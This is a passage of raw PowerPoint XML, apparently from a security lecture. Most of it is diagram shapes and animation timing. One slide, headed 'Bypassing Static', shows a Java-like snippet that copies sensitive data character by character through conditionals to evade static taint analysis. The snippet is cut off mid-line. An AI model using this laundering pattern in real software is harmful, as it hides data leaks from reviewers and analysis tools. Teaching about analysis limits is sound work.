          <p:cNvPr id="138269" name="Oval 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5070412" y="5274809"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138278" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5669280" y="3785681"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138280" name="Oval 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1716405" y="2462589"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138281" name="Oval 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3466355" y="2424514"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138283" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2025016" y="1738249"/>
            <a:ext cx="568325" cy="533400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 22 w 358"/>
              <a:gd name="T1" fmla="*/ 0 h 336"/>
              <a:gd name="T2" fmla="*/ 56 w 358"/>
              <a:gd name="T3" fmla="*/ 183 h 336"/>
              <a:gd name="T4" fmla="*/ 358 w 358"/>
              <a:gd name="T5" fmla="*/ 336 h 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58" h="336">
                <a:moveTo>
                  <a:pt x="22" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="30"/>
                  <a:pt x="0" y="127"/>
                  <a:pt x="56" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="239"/>
                  <a:pt x="295" y="304"/>
                  <a:pt x="358" y="33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8284" name="Freeform 44"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3016712" y="2147217"/>
            <a:ext cx="614154" cy="263525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 432"/>
              <a:gd name="T1" fmla="*/ 22 h 166"/>
              <a:gd name="T2" fmla="*/ 309 w 432"/>
              <a:gd name="T3" fmla="*/ 24 h 166"/>
              <a:gd name="T4" fmla="*/ 432 w 432"/>
              <a:gd name="T5" fmla="*/ 166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2" h="166">
                <a:moveTo>
                  <a:pt x="0" y="22"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="22"/>
                  <a:pt x="237" y="0"/>
                  <a:pt x="309" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="48"/>
                  <a:pt x="407" y="137"/>
                  <a:pt x="432" y="16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8285" name="Freeform 45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3535680" y="2836164"/>
            <a:ext cx="838200" cy="800100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 96 w 528"/>
              <a:gd name="T1" fmla="*/ 24 h 504"/>
              <a:gd name="T2" fmla="*/ 48 w 528"/>
              <a:gd name="T3" fmla="*/ 24 h 504"/>
              <a:gd name="T4" fmla="*/ 384 w 528"/>
              <a:gd name="T5" fmla="*/ 168 h 504"/>
              <a:gd name="T6" fmla="*/ 336 w 528"/>
              <a:gd name="T7" fmla="*/ 312 h 504"/>
              <a:gd name="T8" fmla="*/ 528 w 528"/>
              <a:gd name="T9" fmla="*/ 504 h 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8" h="504">
                <a:moveTo>
                  <a:pt x="96" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="12"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="48" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="48"/>
                  <a:pt x="336" y="120"/>
                  <a:pt x="384" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="432" y="216"/>
                  <a:pt x="312" y="256"/>
                  <a:pt x="336" y="312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="360" y="368"/>
                  <a:pt x="444" y="436"/>
                  <a:pt x="528" y="50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8287" name="Freeform 47"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3840480" y="2721864"/>
            <a:ext cx="1981200" cy="959713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1248"/>
              <a:gd name="T1" fmla="*/ 0 h 960"/>
              <a:gd name="T2" fmla="*/ 624 w 1248"/>
              <a:gd name="T3" fmla="*/ 48 h 960"/>
              <a:gd name="T4" fmla="*/ 1008 w 1248"/>
              <a:gd name="T5" fmla="*/ 240 h 960"/>
              <a:gd name="T6" fmla="*/ 1248 w 1248"/>
              <a:gd name="T7" fmla="*/ 960 h 9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48" h="960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="4"/>
                  <a:pt x="456" y="8"/>
                  <a:pt x="624" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792" y="88"/>
                  <a:pt x="904" y="88"/>
                  <a:pt x="1008" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1112" y="392"/>
                  <a:pt x="1180" y="676"/>
                  <a:pt x="1248" y="96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8288" name="Freeform 48"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4620768" y="4179354"/>
            <a:ext cx="1143000" cy="1130327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 768 w 768"/>
              <a:gd name="T1" fmla="*/ 0 h 720"/>
              <a:gd name="T2" fmla="*/ 480 w 768"/>
              <a:gd name="T3" fmla="*/ 96 h 720"/>
              <a:gd name="T4" fmla="*/ 576 w 768"/>
              <a:gd name="T5" fmla="*/ 384 h 720"/>
              <a:gd name="T6" fmla="*/ 0 w 768"/>
              <a:gd name="T7" fmla="*/ 720 h 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68" h="720">
                <a:moveTo>
                  <a:pt x="768" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="16"/>
                  <a:pt x="512" y="32"/>
                  <a:pt x="480" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="160"/>
                  <a:pt x="656" y="280"/>
                  <a:pt x="576" y="384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="496" y="488"/>
                  <a:pt x="248" y="604"/>
                  <a:pt x="0" y="72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8290" name="Freeform 50"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2086293" y="2426504"/>
            <a:ext cx="717550" cy="196850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 452 w 452"/>
              <a:gd name="T1" fmla="*/ 9 h 124"/>
              <a:gd name="T2" fmla="*/ 365 w 452"/>
              <a:gd name="T3" fmla="*/ 123 h 124"/>
              <a:gd name="T4" fmla="*/ 183 w 452"/>
              <a:gd name="T5" fmla="*/ 4 h 124"/>
              <a:gd name="T6" fmla="*/ 0 w 452"/>
              <a:gd name="T7" fmla="*/ 96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52" h="124">
                <a:moveTo>
                  <a:pt x="452" y="9"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="438" y="28"/>
                  <a:pt x="410" y="124"/>
                  <a:pt x="365" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="122"/>
                  <a:pt x="244" y="8"/>
                  <a:pt x="183" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="0"/>
                  <a:pt x="38" y="77"/>
                  <a:pt x="0" y="9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38291" name="Picture 5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828800" y="1323304"/>
            <a:ext cx="465138" cy="441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8292" name="Picture 5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590800" y="2009104"/>
            <a:ext cx="465138" cy="441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8293" name="Picture 5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676400" y="2426617"/>
            <a:ext cx="465138" cy="441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8294" name="Picture 5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429000" y="2390104"/>
            <a:ext cx="465138" cy="441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8295" name="Picture 5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638800" y="3758721"/>
            <a:ext cx="465138" cy="441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8296" name="Picture 5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267200" y="5243034"/>
            <a:ext cx="465138" cy="441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8297" name="Picture 5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429000" y="2390104"/>
            <a:ext cx="465138" cy="441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8301" name="Oval 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6155055" y="3785681"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138302" name="Oval 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6628130" y="3785681"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138303" name="Oval 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7117080" y="3785681"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138305" name="Freeform 65"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5431154" y="4364929"/>
            <a:ext cx="1717675" cy="947738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 906 w 1082"/>
              <a:gd name="T1" fmla="*/ 0 h 723"/>
              <a:gd name="T2" fmla="*/ 994 w 1082"/>
              <a:gd name="T3" fmla="*/ 271 h 723"/>
              <a:gd name="T4" fmla="*/ 378 w 1082"/>
              <a:gd name="T5" fmla="*/ 299 h 723"/>
              <a:gd name="T6" fmla="*/ 0 w 1082"/>
              <a:gd name="T7" fmla="*/ 723 h 7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82" h="723">
                <a:moveTo>
                  <a:pt x="906" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="921" y="45"/>
                  <a:pt x="1082" y="221"/>
                  <a:pt x="994" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="906" y="321"/>
                  <a:pt x="544" y="224"/>
                  <a:pt x="378" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="374"/>
                  <a:pt x="79" y="635"/>
                  <a:pt x="0" y="723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38308" name="Picture 6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50280" y="4928681"/>
            <a:ext cx="479425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8309" name="Picture 6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630544" y="3755982"/>
            <a:ext cx="465138" cy="441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 rot="18876832">
            <a:off x="4076096" y="3647289"/>
            <a:ext cx="685800" cy="48517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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New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66401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8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8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8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8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8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8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8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8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8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8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8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8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8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38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8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8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138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38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38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withGroup">
                            <p:stCondLst>
                              <p:cond delay="35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38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38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38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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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38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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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138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0.0125 C 0.00104 0.01828 -0.00677 0.03449 0.00486 0.04722 C 0.01649 0.05995 0.06024 0.07638 0.06944 0.08888 C 0.07864 0.10138 0.0533 0.10486 0.06007 0.12152 C 0.06684 0.13819 0.0993 0.175 0.10955 0.18888 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1382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22" y="8819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1382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7800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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138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8300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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38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8800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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38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 nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="9300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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138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 nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="9800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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38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 nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1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2" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1382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5" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1382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8" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1382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3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383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38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38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1383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38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138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383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38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38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47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383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1383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138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138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38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 nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="138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 nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1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2" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="138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6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1.85185E-6 C 0.02101 -0.00579 0.04202 -0.01134 0.05452 -0.00394 C 0.06702 0.00347 0.07188 0.03287 0.07535 0.04444 C 0.079 0.05602 0.07778 0.06134 0.07535 0.06551 C 0.07292 0.06967 0.07257 0.06898 0.06111 0.06944 C 0.04966 0.06991 0.02136 0.06504 0.0066 0.06805 C -0.00816 0.07106 -0.01944 0.08032 -0.02725 0.08773 C -0.03489 0.09514 -0.03593 0.10301 -0.0408 0.1125 C -0.04566 0.12199 -0.05173 0.13518 -0.0559 0.14514 C -0.06024 0.15509 -0.0651 0.16018 -0.06632 0.17268 C -0.06753 0.18518 -0.0658 0.20231 -0.06389 0.21967 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="165" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1383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8" y="106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6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9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="138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304" grpId="0" animBg="1"/>
      <p:bldP spid="138253" grpId="0" animBg="1"/>
      <p:bldP spid="138250" grpId="0" animBg="1"/>
      <p:bldP spid="138251" grpId="0" animBg="1"/>
      <p:bldP spid="138255" grpId="0"/>
      <p:bldP spid="138256" grpId="0"/>
      <p:bldP spid="138258" grpId="0" animBg="1"/>
      <p:bldP spid="138259" grpId="0" animBg="1"/>
      <p:bldP spid="138264" grpId="0" animBg="1"/>
      <p:bldP spid="138265" grpId="0" animBg="1"/>
      <p:bldP spid="138266" grpId="0" animBg="1"/>
      <p:bldP spid="138267" grpId="0" animBg="1"/>
      <p:bldP spid="138268" grpId="0" animBg="1"/>
      <p:bldP spid="138269" grpId="0" animBg="1"/>
      <p:bldP spid="138278" grpId="0" animBg="1"/>
      <p:bldP spid="138280" grpId="0" animBg="1"/>
      <p:bldP spid="138281" grpId="0" animBg="1"/>
      <p:bldP spid="138283" grpId="0" animBg="1"/>
      <p:bldP spid="138284" grpId="0" animBg="1"/>
      <p:bldP spid="138285" grpId="0" animBg="1"/>
      <p:bldP spid="138287" grpId="0" animBg="1"/>
      <p:bldP spid="138288" grpId="0" animBg="1"/>
      <p:bldP spid="138288" grpId="1" animBg="1"/>
      <p:bldP spid="138290" grpId="0" animBg="1"/>
      <p:bldP spid="138301" grpId="0" animBg="1"/>
      <p:bldP spid="138302" grpId="0" animBg="1"/>
      <p:bldP spid="138303" grpId="0" animBg="1"/>
      <p:bldP spid="138305" grpId="0" animBg="1"/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Bypassing Static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Exploiting the Static Analysis FP/FN tradeoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arrays, files, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629962" y="2262107"/>
            <a:ext cx="7683213" cy="368553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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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 data = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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getSensitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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 data2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00006D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00006D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00006D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" charset="0"/>
                <a:ea typeface="Menlo" charset="0"/>
                <a:cs typeface="Menlo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Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>data.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00006D"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>data.charAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>) == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>'a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular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fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>        data2 += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>'a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00006D"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Bold" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
